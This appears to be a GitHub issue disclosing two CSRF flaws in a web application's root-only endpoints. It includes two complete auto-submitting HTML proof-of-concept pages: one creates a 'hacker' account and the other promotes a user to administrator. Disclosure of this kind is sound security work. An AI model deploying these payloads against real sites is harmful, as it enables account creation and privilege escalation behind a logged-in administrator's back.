Two CSRF vulnerabilities that can create a new user and Promote it to Administrator privileges

When the super administrator (root) logged in, there are 2 important POST methods without CSRF protection, can create a new user and promote it to administrator privileges. This can be achieved by cheating the super administrator to open the 2 pages when he logged in.
```

<!DOCTYPE html>
<html>
  <head>
  <title> CSRF Proof Of Concept - Create a new user</title>
  <script type="text/javascript">
    function exec1(){
      document.getElementById('form1').submit();
    }
  </script>
  </head>
  <body onload="exec1();">
    <form id="form1" action="http://localhost/root_create_user" method="POST">
      <input type="hidden" name="username" value="hacker" />
      <input type="hidden" name="password" value="hacker" />
      <input type="hidden" name="realname" value="hacker" />
      <input type="hidden" name="email" value="" />
    </form>
  </body>
</html>
```
```

<!DOCTYPE html>
<html>
  <head>
  <title> CSRF Proof Of Concept - update a user to admin</title>
  <script type="text/javascript">
    function exec1(){
      document.getElementById('form1').submit();
    }
  </script>
  </head>
  <body onload="exec1();">
    <form id="form1" action="http://localhost/update_admin_info" method="POST">
      <input type="hidden" name="id" value="7" />
      <input type="hidden" name="check" value="false" />
    </form>
  </body>
</html>
```

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Two CSRF vulnerabilities that can create a new user and Promote it to Administrator privileges #6

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

Two CSRF vulnerabilities that can create a new user and Promote it to Administrator privileges #6

Description

Metadata

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

Issue actions